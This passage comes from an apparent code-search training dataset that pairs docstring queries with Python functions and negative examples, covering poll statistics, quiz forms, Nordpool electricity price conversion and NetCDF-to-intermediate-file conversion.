create_multiple_choice_form(question, \n dbsession, user_choice)\n if question.question_type == \"selectTrue\":\n schema = create_select_all_form(question,\n dbsession, user_choice)\n if question.question_type == \"shortAnswer\":\n schema = create_short_answer_form(question, \n dbsession, user_choice)\n if question_num == total_questions: #check if this is the last question\n form = deform.Form(schema[0],\n buttons=('review test',))\n else:\n form = deform.Form(schema[0],\n buttons=('next question',))\n if question.question_type == \"shortAnswer\":\n return {\"test\":test,'form':form.render(schema[1]),\n 'link':'/test?id='+str(test.id), 'main': main} #if it's a short answer question (returns default value)\n return {\"test\":test,'form':form.render(), 'link':'/test?id='+str(test.id), 'main': main}",
"def dns_response_answers(self, questions):\n records = b''\n for question in questions:\n name = str(b'.'.join(question['name']), encoding='UTF-8')\n# print(name)\n if name == \"updates.paloaltonetworks.com\":\n IP = updates\n elif name == \"downloads.paloaltonetworks.com\":\n IP = downloads\n elif name == \"s0000.urlcloud.paloaltonetworks.com\":\n IP = urlcloud\n elif name == \"dns.service.paloaltonetworks.com\":\n IP = dnsservice\n else:\n IP = default\n# print (IP)\n \n record = b''\n for label in question['name']:\n # Length octet\n record += bytes([len(label)])\n record += label\n # Zero length octet\n record += b'\\x00'\n # TYPE - just copy QTYPE\n # TODO QTYPE values set is superset of TYPE values set, handle different QTYPEs, see RFC 1035 3.2.3.\n record += question['qtype']\n # CLASS - just copy QCLASS\n # TODO QCLASS values set is superset of CLASS values set, handle at least * QCLASS, see RFC 1035 3.2.5.\n record += question['qclass']\n # TTL - 32 bit unsigned integer. Set to 0 to inform, that response\n # should not be cached.\n record += b'\\x00\\x00\\x00\\x00'\n # RDLENGTH - 16 bit unsigned integer, length of RDATA field.\n # In case of QTYPE=A and QCLASS=IN, RDLENGTH=4.\n record += b'\\x00\\x04'\n # RDATA - in case of QTYPE=A and QCLASS=IN, it's IPv4 address.\n record += b''.join(map(\n lambda x: bytes([int(x)]),\n IP.split('.')\n ))\n records += record\n return records",
"def getReplyResults():",
"def test_get_all_questions(self):\n self.token = self.get_token()\n head = {'Content-Type': 'application/json', 'Authorization': 'JWT {}'.format(self.token)}\n\n res = self.test_client().post('/api/v1/questions',\\\n data=json.dumps(self.question), headers=head)\n\n self.assertEqual(res.status_code, 201)\n\n all_questions = self.test_client().get('/api/v1/questions', \\\n headers = head)\n\n self.assertEqual(all_questions.status_code, 200)\n self.assertEqual('application/json', all_questions.content_type)\n self.assertIn(\"How to create an api?\", all_questions.data)\n\n cursor = CONNECTION.cursor()\n cursor.execute('SELECT * FROM questions;')\n questions = cursor.fetchall()\n cursor.close()\n self.assertIn(questions[0][1], all_questions.data)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Get the poll stats. Fetch all the answers from the JotForm API and convert them to cumulative statistics.
|
async def get_poll_stats(uuid: str):
credentials = redis.get(uuid)
if credentials is None:
raise HTTPError(401, "Unauthorised request.")
app_key, poll_id = credentials.decode("utf-8").split(
"-") # Get back user credentials.
submissions = get_submissions(poll_id, app_key)
# We now have form submissions with us.
question_ids = get_question_ids(app_key, poll_id) # And the question IDs.
counts = jsonable_encoder(get_answer_stats(submissions, question_ids))
return JSONResponse(counts)
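get_submissions and get_answer_stats are helpers whose implementations are not part of this snippet. As one plausible reading of "convert them to cumulative statistics", the sketch below tallies how often each answer value occurs per question ID; the submission schema it assumes (an "answers" mapping of question ID to an object with an "answer" field, as in the JotForm submissions payload) should be checked against the actual API response:

from collections import Counter, defaultdict


def get_answer_stats(submissions: list[dict], question_ids: list[str]) -> dict[str, dict[str, int]]:
    # Illustrative implementation, not taken from the source: cumulative answer counts.
    counts: dict[str, Counter] = defaultdict(Counter)
    for submission in submissions:
        answers = submission.get("answers", {})
        for qid in question_ids:
            answer = answers.get(qid, {}).get("answer")
            if answer is not None:
                # Non-string answers (e.g. multiple-choice lists) are flattened to their str form.
                counts[qid][str(answer)] += 1
    return {qid: dict(counter) for qid, counter in counts.items()}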
|
[
"def get_results(poll):\n\n assert poll is not None, \"Invalid poll: None\"\n\n if not poll['closed']:\n return None\n\n results = {}\n\n # Get cached results\n results_db = get_entries('results', 'poll', poll['uid'])\n\n # If no cache, compute the results and store them\n if len(results_db) == 0:\n ballots = get_entries('ballots', 'poll', poll['uid'])\n\n # If no ballots provide, no results\n if len(ballots) == 0:\n return None\n\n # Number of ballots cast\n ballots_count = len(ballots) / len(poll['choices'])\n\n # Build data structures\n choices = {}\n results = {}\n for choice in poll['choices']:\n choices[choice['id']] = {'votes': [0] * 7}\n results[choice['id']] = {'ballots': ballots_count}\n\n # Count the number of vote for each grade for each choice\n for ballot in ballots:\n choices[ballot['choice']]['votes'][ballot['grade']] += 1\n\n # Store the count in percentage for display purposes\n for choice in choices:\n results[choice]['percentages'] = []\n for vote in choices[choice]['votes']:\n results[choice]['percentages'].append(100 * vote / ballots_count)\n\n # Transfrom the number of vote to a list of votes\n for _, choice in choices.items():\n votes = []\n for i in range(len(choice['votes'])):\n votes.extend([i] * choice['votes'][i])\n choice['votes'] = votes\n\n # Compute the median, the number of better and worse vote.\n for _, choice in choices.items():\n choice_compute(choice)\n\n # Apply the grade for each choice\n for choice in choices:\n if choices[choice]['median'] == 0:\n results[choice]['grade'] = \"To reject\"\n elif choices[choice]['median'] == 1:\n results[choice]['grade'] = \"Poor\"\n elif choices[choice]['median'] == 2:\n results[choice]['grade'] = \"Acceptable\"\n elif choices[choice]['median'] == 3:\n results[choice]['grade'] = \"Fair\"\n elif choices[choice]['median'] == 4:\n results[choice]['grade'] = \"Good\"\n elif choices[choice]['median'] == 5:\n results[choice]['grade'] = \"Very Good\"\n elif choices[choice]['median'] == 6:\n results[choice]['grade'] = \"Excellent\"\n\n if choices[choice]['better'] > choices[choice]['worse']:\n results[choice]['grade'] += \"+\"\n else:\n results[choice]['grade'] += \"-\"\n\n # Sort the vote to etablish the ranks\n ranks = rank_choices(choices, ballots_count)\n for choice in results:\n results[choice]['rank'] = ranks[choice]\n\n\n # Store the results\n results_db = []\n for choice, result in results.items():\n results_db.append((poll['uid'], choice, \";\".join([str(rank) for rank in result['rank']]) if isinstance(result['rank'], list) else str(result['rank']), result['grade'], \";\".join([str(percentage) for percentage in result['percentages']]), result['ballots']))\n\n get_db().executemany(\"INSERT INTO results (poll, choice, rank, grade, percentages, ballots) VALUES (?, ?, ?, ?, ?, ?)\", results_db)\n\n # Destroy the ballots\n get_db().execute('DELETE FROM ballots WHERE poll = ?', [poll['uid']])\n\n else:\n for result in results_db:\n results[result['choice']] = {'rank' : int(result['rank']) if ';' not in result['rank'] else [int(vote) for vote in result['rank'].split(';')], 'grade': result['grade'], 'percentages': [int(percentage) for percentage in result['percentages'].split(';')], 'ballots': result['ballots']}\n\n return results",
"async def pollstatus(self):\n if not ongoingPoll():\n await ctx.send('There is no poll going on currently, sorry!')\n return\n question = fetchAttr('poll_data', 'question')\n opts = fetchAttr('poll_data', 'options')\n votesSoFar = fetchAttr('poll_data', 'votes')\n message = question + '\\n'\n for i in range(len(opts)):\n message += 'Option ' + str(i + 1) + ': ' + opts[i] + ', currently has ' + str(votesSoFar[i]) + ' votes.\\n'\n await ctx.send(message)",
"def single_pollrun(pollrun, responses, question):\n chart_type = None\n chart_data = []\n summary_table = None\n\n answers = Answer.objects.filter(response__in=responses, question=question)\n if answers:\n if question.question_type == Question.TYPE_OPEN:\n chart_type = 'open-ended'\n chart_data = word_cloud_data(answers)\n else:\n chart_type = 'bar'\n if question.question_type == Question.TYPE_NUMERIC:\n chart_data = single_pollrun_auto_categorize(answers)\n else:\n chart_data = single_pollrun_multiple_choice(answers, pollrun)\n\n _, answer_avgs, answer_stdevs, response_rates = utils.summarize_by_pollrun(\n answers, responses)\n summary_table = [\n ('Mean', answer_avgs.get(pollrun.pk, 0)),\n ('Standard deviation', answer_stdevs.get(pollrun.pk, 0)),\n ('Response rate average (%)', response_rates.get(pollrun.pk, 0)),\n ]\n\n return chart_type, chart_data, summary_table",
"def fetch_statistics(conf):\n return fetch_json(\"http://%s:%d/monitor/statistics.json\" % (conf[\"host\"], conf[\"port\"]), timeout=30)",
"def get_stats(self):\n \"\"\"\n Function to submit GET request to stats endpoint.\n\n Args:\n\n Returns:\n res (obj): Response object from GET request\n \"\"\"\n endpoint = '/stats'\n response = requests.get(baseUrl + endpoint)\n\n return response",
"def poll(self):\n data = self.get_data()\n if data:\n self.add_metrics(data)",
"def get_response_stats_data(question_id, user_response):\n webpage = 'https://willyoupressthebutton.com/{0}/'.format(question_id)\n if user_response:\n webpage += 'yes'\n else:\n webpage += 'no'\n\n webpage_content = get_webpage(webpage)\n\n soup = bs(webpage_content, 'html.parser')\n\n main_container = soup.find(id='maincontainer')\n\n if main_container is None:\n raise InvalidIndex({\n \"message\":\"No question found with that index\",\n \"index\": question_id\n })\n\n stats = [stat for stat in [a for a in main_container.find(id='statsBar').children][1].children]\n\n did_press = stats[1].getText()\n did_press_count = int(did_press.split()[0])\n did_press_percent = int(did_press[did_press.index('(') + 1: did_press.index(')') - 1])\n\n didnt_press = stats[3].getText()\n didnt_press_count = int(didnt_press.split()[0])\n didnt_press_percent = 100 - did_press_percent\n\n return {\n 'id': question_id,\n 'pro_count': did_press_count,\n 'con_count': didnt_press_count,\n 'pro_percent': did_press_percent,\n 'con_percent': didnt_press_percent\n }",
"def _gather_stats(self):\n # Set all values to zero\n self.wins = 0\n self.ties = 0\n self.losses = 0\n self.season_len = 0\n self.points = 0\n self.vs_points = 0\n self.win_percentage = 0.0\n self.point_difference = 0\n self.wins_vs_teams = []\n self.losses_vs_teams = []\n self.ties_vs_teams = []\n self.record_vs_teams = []\n self.f_record_vs_teams = []\n wins_list = []\n losses_list = []\n ties_list = []\n opponents = []\n # Gather statistics\n for g in self.season:\n # Gather the number of games won, lost, and tied\n g_result = g['result']\n opponent = g['vs']\n if opponent not in opponents:\n opponents.append(opponent)\n if g_result == 'w':\n self.wins += 1\n wins_list.append(g)\n elif g_result == 'l':\n self.losses += 1\n losses_list.append(g)\n elif g_result == 't':\n self.ties += 1\n ties_list.append(g)\n self.season_len += 1\n # Gather the number of runs scored\n g_points = g['points']\n self.points += g_points\n # Gather the number of runs scored by opponents\n g_vs_points = g['vs_points']\n self.vs_points += g_vs_points\n\n for opponent in opponents:\n self.wins_vs_teams.append(self._records_vs(wins_list, opponent))\n self.losses_vs_teams.append(self._records_vs(losses_list, opponent))\n self.ties_vs_teams.append(self._records_vs(ties_list, opponent))\n # Calculate win percentage\n try:\n self.win_percentage = self.wins / self.season_len\n except ZeroDivisionError:\n self.win_percentage = None\n\n # Calculate difference in points\n self.point_difference = self.points - self.vs_points\n\n # Calculate record against opponents\n for x in range(len(opponents)):\n self.record_vs_teams.append({opponents[x]: {'w': self.wins_vs_teams[x][opponents[x]],\n 'l': self.losses_vs_teams[x][opponents[x]],\n 't': self.ties_vs_teams[x][opponents[x]]}})\n self.f_record_vs_teams.append(\n f\"\"\"{opponents[x]}: {self.wins_vs_teams[x][opponents[x]]}-{self.losses_vs_teams[x][opponents[x]]}-{self.ties_vs_teams[x][opponents[x]]}\"\"\")",
"def get_stats(self):\n employees = self.object.employees_employed.all()\n total_employees = employees.count()\n\n birthplace_known_count = Employee.objects.birthplace_known(bureau_states=self.object).count()\n\n # Employees with date of birth filled\n employees_with_dob = employees.exclude(date_of_birth='')\n # Age in 1865\n ages = get_ages_in_year(employees_with_dob, 1865)\n\n stats = [\n ('Avg. age in 1865', get_float_format(get_mean(ages), places=1)),\n ('Median age in 1865', get_float_format(get_median(ages), places=0)),\n ('% VRC', get_float_format(self.object.percent_vrc_employees())),\n ('% USCT', get_float_format(\n get_percent(part=Employee.objects.usct(bureau_states=self.object).count(), total=total_employees))\n ),\n ('% Foreign-born', get_float_format(\n get_percent(part=Employee.objects.foreign_born(bureau_states=self.object).count(),\n total=birthplace_known_count))\n ),\n ('% Born there', get_float_format(\n get_percent(part=get_number_employees_born_in_bureau_state(employees, self.object),\n total=birthplace_known_count))\n ),\n ('% Female', get_float_format(\n get_percent(part=employees.filter(gender=Employee.Gender.FEMALE).count(), total=total_employees))\n ),\n ('% Identified as \"colored\"', get_float_format(\n get_percent(part=employees.filter(colored=True).count(), total=total_employees))\n ),\n ('% Died during assignment', get_float_format(\n get_percent(part=employees.filter(died_during_assignment=True).count(), total=total_employees))\n ),\n ('Former slaves', employees.filter(former_slave=True).count()),\n ('% Former slaveholder', get_float_format(\n get_percent(part=employees.filter(slaveholder=True).count(), total=total_employees))\n ),\n ('% Union veterans', get_float_format(\n get_percent(part=employees.filter(union_veteran=True).count(), total=total_employees))\n ),\n ('% Confederate veterans', get_float_format(\n get_percent(part=employees.filter(confederate_veteran=True).count(), total=total_employees))\n ),\n ('Left-hand penmanship contest entrants', employees.filter(penmanship_contest=True).count()),\n ]\n\n # Breakdown per AilmentType\n for ailment_type in AilmentType.objects.all():\n ailment_type_count = employees.filter(ailments__type=ailment_type).count()\n stats.append((f'% with {ailment_type}',\n get_float_format(get_percent(part=ailment_type_count, total=total_employees))))\n\n # Breakdown per Ailment, if more than one for the type\n if ailment_type.ailments.count() > 1:\n for ailment in ailment_type.ailments.all():\n ailment_count = employees.filter(ailments=ailment).count()\n stats.append((f'% with {ailment}',\n get_float_format(get_percent(part=ailment_count, total=total_employees))))\n\n return stats",
"def fetching_latest_quiz_statistics(request_ctx, course_id, quiz_id, all_versions, **request_kwargs):\n\n path = '/v1/courses/{course_id}/quizzes/{quiz_id}/statistics'\n payload = {\n 'all_versions' : all_versions,\n }\n url = request_ctx.base_api_url + path.format(course_id=course_id, quiz_id=quiz_id)\n response = client.get(request_ctx, url, payload=payload, **request_kwargs)\n\n return response",
"def get_attempt_stats(quiz, response):\n total_marks = 0\n correct_answer = 0\n incorrect_answer = 0\n total_number = Question.objects.filter(quiz=quiz, published=True).count()\n response_data = response.get_response()\n\n for qid in response_data:\n try:\n question = Question.objects.get(id=int(qid))\n except Question.DoesNotExists:\n # there might be other kind of data in response_data we don't care about\n continue\n question_type = QUESTION_TYPE[question.question_type]\n marks = question_type.get_marks(question, extract_response(response_data, qid))\n total_marks += marks\n if marks > 0:\n correct_answer += 1\n else:\n incorrect_answer += 1\n grade = round(total_marks / db.get_quiz_total_marks(quiz), 2)\n unanswered = total_number - (correct_answer + incorrect_answer)\n if quiz.quizsettings.showAnswersAfterAttempt:\n # Student allowed to see answer and hence the grade after attending quiz\n return dict(total_grade=grade, correct=correct_answer, incorrect=incorrect_answer, \n unanswered=unanswered, total_questions=total_number, showAnswer=True)\n return dict(total_grade='Shown after exam ends', unanswered=unanswered, total_questions=total_number, showAnswer=False)",
"def format_getstat1(self):\n\n raw_response = self.getstat1()\n response = {\n \"miner\": dict(),\n \"eth_pool\": dict(),\n \"dcr_pool\": dict(),\n \"GPUs\": dict(),\n }\n\n response[\"miner\"][\"version\"] = raw_response[0]\n hours = int(raw_response[1]) // 60\n minutes = int(raw_response[1]) % 60\n response[\"miner\"][\"runtime\"] = \"{:02d}:{:02d}\".format(hours, minutes)\n\n [\n response[\"eth_pool\"][\"total_hashrate\"],\n response[\"eth_pool\"][\"accepted\"],\n response[\"eth_pool\"][\"rejected\"],\n ] = [int(val) for val in raw_response[2].split(\";\")]\n if response[\"eth_pool\"][\"total_hashrate\"] > 0:\n response[\"eth_pool\"][\"total_hashrate\"] *= 1000\n\n [\n response[\"dcr_pool\"][\"total_hashrate\"],\n response[\"dcr_pool\"][\"accepted\"],\n response[\"dcr_pool\"][\"rejected\"],\n ] = [int(val) for val in raw_response[4].split(\";\")]\n if response[\"dcr_pool\"][\"total_hashrate\"] > 0:\n response[\"dcr_pool\"][\"total_hashrate\"] *= 1000\n\n response[\"eth_pool\"][\"pool\"] = raw_response[7]\n\n [\n response[\"eth_pool\"][\"invalid\"],\n response[\"eth_pool\"][\"pool_switches\"],\n response[\"dcr_pool\"][\"invalid\"],\n response[\"dcr_pool\"][\"pool_switches\"],\n ] = [int(val) for val in raw_response[8].split(\";\")]\n\n percard_eth_hashrate = [\n (int(val) * 1000) if val != \"off\" else 0\n for val in raw_response[3].split(\";\")\n ]\n\n percard_dcr_hashrate = [\n (float(val) * 1000) if val != \"off\" else 0\n for val in raw_response[5].split(\";\")\n ]\n\n tempsfans = raw_response[6].split(\";\")\n tempsfans = [\n [int(value), int(tempsfans[index + 1])]\n for index, value in enumerate(tempsfans)\n if not index % 2\n ]\n\n for gpu in range(len(percard_eth_hashrate)):\n response[\"GPUs\"][\"GPU {}\".format(gpu)] = {\n \"eth_hashrate\": percard_eth_hashrate[gpu],\n \"dcr_hashrate\": percard_dcr_hashrate[gpu],\n \"temp\": tempsfans[gpu][0],\n \"fan\": tempsfans[gpu][1],\n }\n response[\"miner\"][\"ip\"] = self.ip\n response[\"miner\"][\"port\"] = self.port\n\n return response",
"def calc_statistics(self):\n pass",
"def get_pivot_response_stats(pivot_id, pivot_type):\n cursor = connection.cursor()\n \n cursor.execute(\"\"\"\n SELECT plugin_option.plugin_id, plugin_option.value\n FROM drill_multiplechoiceresponse AS mcr\n INNER JOIN (\n SELECT pivot_qn.plugin_id, mco.id AS option_id, mco.value\n FROM (\n SELECT id, question_plugin_id AS plugin_id\n FROM drill_question\n WHERE pivot_type = \"%(pivot_type)s\"\n AND pivot_id = %(pivot_id)d\n ) AS pivot_qn\n INNER JOIN drill_multiplechoiceoption AS mco\n ON mco.question_id = pivot_qn.id\n ) AS plugin_option\n ON plugin_option.option_id = mcr.option_id\n \"\"\" % {'pivot_type': pivot_type, 'pivot_id': pivot_id})\n rows = cursor.fetchall()\n dist_map = {}\n plugin_ids_used = set(plugin_id for (plugin_id, error_value) in rows)\n for plugin_id in plugin_ids_used:\n dist_map[plugin_id] = FreqDist()\n \n for plugin_id, error_value in rows:\n dist_map[plugin_id].inc(error_value)\n \n plugin_map = drill_models.QuestionPlugin.objects.in_bulk(dist_map.keys())\n \n results = [(plugin_map[plugin_id].name, dist) \\\n for (plugin_id, dist) in dist_map.iteritems()]\n combined_dist = FreqDist()\n for name, dist in results:\n combined_dist.inc(name, dist.N())\n results[0:0] = [('By plugin type', combined_dist)]\n \n return results",
"def ratelimits(self, irc, msg, args):\n # before we do anything, make sure we have a twitterApi object.\n if not self.twitterApi:\n irc.reply(\n \"ERROR: Twitter is not authorized. Please check logs before running \"\n \"this command.\"\n )\n return\n # make API call.\n data = self.twitterApi.ApiCall(\n \"application/rate_limit_status\",\n parameters={\"resources\": \"trends,search,statuses,users\"},\n )\n try:\n data = json.loads(data)\n except:\n irc.reply(\"ERROR: Failed to lookup ratelimit data: {0}\".format(data))\n return\n # parse data;\n data = data.get(\"resources\")\n if not data: # simple check if we have part of the json dict.\n irc.reply(\n \"ERROR: Failed to fetch application rate limit status. Something could \"\n \"be wrong with Twitter.\"\n )\n log.error(\"Tweety: ERROR fetching rate limit data: {0}\".format(data))\n return\n # dict of resources and how to parse. key=name, values are for the json dict.\n resources = {\n \"trends\": [\"trends\", \"/trends/place\"],\n \"tsearch\": [\"search\", \"/search/tweets\"],\n \"twitter --id\": [\"statuses\", \"/statuses/show/:id\"],\n \"twitter --info\": [\"users\", \"/users/show/:id\"],\n \"twitter timeline\": [\"statuses\", \"/statuses/user_timeline\"],\n }\n # now iterate through dict above.\n for resource in resources:\n rdict = resources[resource] # get value.\n endpoint = data.get(rdict[0]).get(rdict[1]) # value[0], value[1]\n minutes = \"%sm%ss\" % divmod(\n int(endpoint[\"reset\"]) - int(time.time()), 60\n ) # math.\n output = \"Reset in: {0} Remaining: {1}\".format(\n minutes, endpoint[\"remaining\"]\n )\n irc.reply(\"{0} :: {1}\".format(self._bold(resource), output))",
"def get_all_pokemon_stats():\n\n database_handler = DatabaseAPIHandler()\n\n # There are 807 pokemon callable in the API.\n for pokemon_number in range(1, 808):\n pokemon_status_data = database_handler.get_pokemon_status_data(pokemon_number)\n database_handler.save_pokemon_status_data(pokemon_status_data)",
"def get_stats(self):\n\n self.collect_stats()\n\n #Query the DB\n\n\n return self.stat_fields",
"def get_score(self):\n jira = JiraServer()\n jira_response = jira.make_api_call(self.query)\n return self.process_jira_response(jira_response)",
"def count_votes(self):\n votes = AssignmentPollBallot.objects.filter(poll=self.poll)\n\n shares = None\n if self.principle and config['voting_enable_principles']:\n # Create a dict (key: delegate, value: shares).\n # Example: {1: Decimal('1.000000'), 2: Decimal('45.120000')}\n voting_shares = VotingShare.objects.filter(principle=self.principle)\n shares = dict(voting_shares.values_list('delegate', 'shares'))\n\n options = AssignmentOption.objects.filter(poll=self.poll).order_by('weight').all()\n pollmethod = self.poll.pollmethod\n\n result = {\n 'casted': [0, Decimal(0)],\n 'valid': [0, Decimal(0)],\n 'invalid': [0, Decimal(0)]\n }\n\n if pollmethod in ('yn', 'yna'):\n for option in options:\n result[str(option.candidate.id)] = {\n 'Y': [0, Decimal(0)], # [heads, shares]\n 'N': [0, Decimal(0)],\n }\n if pollmethod == 'yna':\n result[str(option.candidate.id)]['A'] = [0, Decimal(0)]\n else: # votes\n for option in options:\n result[str(option.candidate.id)] = [0, Decimal(0)]\n result['A'] = [0, Decimal(0)]\n result['N'] = [0, Decimal(0)]\n\n # Sum up the votes.\n for vote in votes:\n if vote.delegate is None:\n delegate_share = 1\n else:\n try:\n delegate_share = shares[vote.delegate.pk] if shares else 1\n except KeyError:\n # Occurs if voting share was removed after delegate cast a vote.\n continue\n\n if pollmethod in ('yn', 'yna'):\n # count every vote for each candidate\n for candidate_id, value in vote.vote.items():\n result[candidate_id][value][0] += 1\n result[candidate_id][value][1] += delegate_share\n else:\n if vote.vote in ('A', 'N', 'invalid'):\n result[vote.vote][0] += 1\n result[vote.vote][1] += delegate_share\n else:\n for candidateId in vote.vote:\n result[candidateId][0] += 1\n result[candidateId][1] += delegate_share\n result['casted'][0] += 1\n result['casted'][1] += delegate_share\n result['valid'][0] = result['casted'][0] - result['invalid'][0]\n result['valid'][1] = result['casted'][1] - result['invalid'][1]\n\n return result"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Converts Nordpool data into NVE format. Only cities with an assigned "area number" are extracted; see constants.NP2PO.
|
def standardize_nordpool(df: pd.DataFrame) -> pd.DataFrame:
std_rep = []
for _, row in df.iterrows():
for city, area_num in NP2PO.items():
data_item = {
DATE: row['Date'],
AREA_NUM: area_num,
"Price": row[city],
"Unit": "NOK/MWh",
DATA_SRC: "nordpool"
}
std_rep.append(data_item)
dset = pd.DataFrame(std_rep)
return dset
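
A minimal usage sketch for the converter above, assuming the function and these stand-in constants are defined in the same script. NP2PO, DATE, AREA_NUM and DATA_SRC are placeholders here; the real values live in the project's constants module and may differ.

import pandas as pd

# Hypothetical stand-ins for the project's constants module.
NP2PO = {"Oslo": 1, "Bergen": 5}          # city name -> assigned area number
DATE, AREA_NUM, DATA_SRC = "Date", "AreaNum", "DataSource"

raw = pd.DataFrame({
    "Date": ["2021-01-01", "2021-01-02"],
    "Oslo": [512.3, 498.7],
    "Bergen": [509.9, 501.2],
})

std = standardize_nordpool(raw)
# One output row per (date, city) pair: 4 rows here, in long format with
# columns Date / AreaNum / Price / Unit / DataSource.
print(std)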
|
[
"def pipeline():\n f = Dataset('/Users/akapadia/Scratch/SpaceApps/data/cru_vap_clim_1991-2000.nc', 'r')\n time = f.variables['time'][:]\n lons = f.variables['longitude'][:]\n lats = f.variables['latitude'][:]\n vap = numpy.array(f.variables['vap'][:])\n units = f.variables['vap'].units\n \n num_of_months = vap.shape[0]\n # for month in xrange(num_of_months):\n # print vap[month]\n \n JAN = 0\n lon = 11.58\n lat = 48.15\n lonIndex = getGeographicIndex(lon , lons)\n latIndex = getGeographicIndex(lat, lats)\n\n print vap[0][latIndex][lonIndex], units",
"def nc_to_nps_int(inFile, outFile, date, xfcst, fields, source=None, \n geos2wrf=False, log=None, createIndividualFiles=False,\n expectedUnitsFile=None): \n if log is None:\n log = _default_log() \n flip_lats = False\n flip_lons = False\n # for each vertical level type in the netCDF file, map a standard\n # level ID (e.g. 'ps' for pressure) to its name in the netCDF file\n rootgrp_lev_types = {} # support multiple horizontal level types\n var2lev = {} # map 3d variables to lev_type\n if source == 'g5nr':\n (timeName,latName,lonName,rootgrp_lev_types['ps']) = ('time', 'lat', 'lon', \n 'lev')\n elif source == 'lis':\n latName = 'north_south'\n lonName = 'east_west'\n rootgrp_lev_types['sm'] = 'SoilMoist_profiles'\n rootgrp_lev_types['st'] = 'SoilTemp_profiles'\n timeName = None\n else:\n (timeName,latName,lonName,rootgrp_lev_types['ps']) = ('time', 'lat', 'lon',\n 'lev')\n # Set basic attributes\n if geos2wrf:\n hdate = '{:%Y-%m-%d_%H}'.format(date)\n else:\n hdate = '{:%Y:%m:%d_%H:%M:%S}'.format(date)\n log.debug(\"Reading file {}\".format(inFile)) \n rootgrp = nc4.Dataset(inFile, 'r')\n \n # read the dimensions\n # hack! Estimate lat/lon for LIS\n # (TODO : Fix by flattening lat/lon to 1-d and accounting for \n # the fact that lat/lon values are masked where there is no soil)\n # Actually, I don't think the nps_int file has a record of the lat/lon\n # values - it just uses the REF_LAT/REF_LON and DLAT/DLON, so we can\n # just use the attributes as already doing. The lat_var/lon_var are not\n # being used and the mask issue does not matter since we have the swCorner\n if source == 'lis':\n log.warn(\"Estimating lat/lon for LIS\")\n swLat = rootgrp.getncattr(\"SOUTH_WEST_CORNER_LAT\") \n swLon = rootgrp.getncattr(\"SOUTH_WEST_CORNER_LON\")\n deltalon = rootgrp.getncattr(\"DX\") \n deltalat = rootgrp.getncattr(\"DY\")\n numLats = len(rootgrp.dimensions[\"north_south\"])\n numLons = len(rootgrp.dimensions[\"east_west\"])\n neLat = swLat + (numLats * deltalat) \n neLon = swLon + (numLons * deltalon)\n lat_var = np.linspace(swLat, neLat, numLats)\n lon_var = np.linspace(swLon, neLon, numLons)\n # intermediate format wants west->east and south->north\n flip_lats = True\n flip_lons = True\n dx = 110.0 * deltalon\n dy = 110.0 * deltalat\n else:\n lat_var = rootgrp.variables[latName]\n lon_var = rootgrp.variables[lonName]\n if lat_var[0] > lat_var[1]:\n log.info(\"Flipping latitude values to go South->North\")\n flip_lats = True\n lat_var[:] = lat_var[::-1]\n if lon_var[0] > lon_var[1]:\n log.debug(\"Flipping longitude values to go West->East\")\n flip_lons = True\n lon_var[:] = lon_var[::-1]\n deltalat = ( lat_var[1] - lat_var[0] )\n deltalon = ( lon_var[1] - lon_var[0] ) \n dx = 110.0 * deltalon\n dy = 110.0 * deltalat\n \n \n # read the variables\n for (inName,outName,inUnits,description) in fields:\n log.debug(\"Processing {} variable '{}'\".format(source, inName))\n #var = rootgrp.variables[inName]\n # figure out if it is 2d or 3d\n # hack - only do this for met fields since the variable name\n # passed in for LSM variables is not the actual variable name \n # and we know that they are 3d\n if inName in ('SM', 'SoilMoist_tavg'):\n is_3d = True\n levType = 'sm'\n levName = rootgrp_lev_types['sm']\n log.warn(\"Reading 'SoilMoist_tavg' instead of passed in {}\".format(inName))\n var = rootgrp.variables['SoilMoist_tavg']\n varForUnitsHack = \"SM010200\" # hack: Need somthing that's in expected_units\n elif inName in ('ST', 'SoilTemp_tavg'):\n is_3d = True\n levType = 'st'\n levName = 
rootgrp_lev_types['st']\n log.warn(\"Reading 'SoilTemp_tavg' instead of passed in {}\".format(inName))\n var = rootgrp.variables['SoilTemp_tavg']\n #import pdb ; pdb.set_trace()\n varForUnitsHack = \"ST010200\" # hack: need something that's in expected_units\n else:\n is_3d = False # changed below if 3d\n try:\n var = rootgrp.variables[inName]\n except KeyError:\n log.critical(\"Variable {var} is not in dataset {inFile}\"\n .format(var=inName, inFile=inFile))\n sys.exit(1)\n for levType,levName in rootgrp_lev_types.iteritems():\n if levName in var.dimensions:\n is_3d = True\n log.debug(\"Treating variable '{}' as 3D\".format(inName))\n # now know level type for this variable is `levType'\n varForUnitsHack = outName\n\n (inUnits, out_units) = __verify_units(expectedUnitsFile, var, \n #inName, outName, inUnits, log)\n inName, varForUnitsHack, inUnits, log)\n\n # process\n if not is_3d:\n # NOTE : The slab should be a 2d variable with lon being the first\n # dimension (on the fortran side)\n dimNames = (timeName, latName, lonName, None)\n slab = get_2d_slab_from_var(var, dimNames, None, \n inUnits=inUnits, outUnits=out_units,\n flipLats=flip_lats,\n flipLons=flip_lons, log=log)\n xlvl = 200100.000000\n \n # set missing values - TODO this is SLOW, use Fortran\n try:\n slab[np.where(slab[:] == var.missing_value)] = NPS_INT_MISSING_VALUE\n except AttributeError:\n log.warn(\"Variable '{0}' does not have a 'missing_value' \"\n \"attribute; unable to set the NPS_INT_MISSING_VALUE\"\n .format(inName))\n\n altOutFile = _get_alt_out_file_path(createIndividualFiles, \n os.path.dirname(outFile),\n outName, 200100, date)\n #import pdb ; pdb.set_trace()\n write_slab_cyl(slab, outFile, hdate, xfcst, source, outName, \n out_units, description, xlvl, lat_var[0], lon_var[0], \n deltalat, deltalon, altOutFile=altOutFile)\n else: \n # 3d field\n dimNames = (timeName, latName, lonName, levName)\n log.info(\"For soil params, assuming we start at surface\")\n curr_start_depth = 0.\n levIdx = var.dimensions.index(levName)\n #for levCtr in range(1, var.shape[levIdx]+1):\n #for levCtr in range(var.shape[levIdx]-1, -1, -1):\n for levCtr in range(var.shape[levIdx]):\n slab = get_2d_slab_from_var(var, dimNames, lev=levCtr, \n flipLats=flip_lats,\n inUnits=inUnits, outUnits=out_units,\n flipLons=flip_lons, log=log)\n # set missing values - This is a bit SLOW, but not a bottleneck\n # TODO : Works for LIS. 
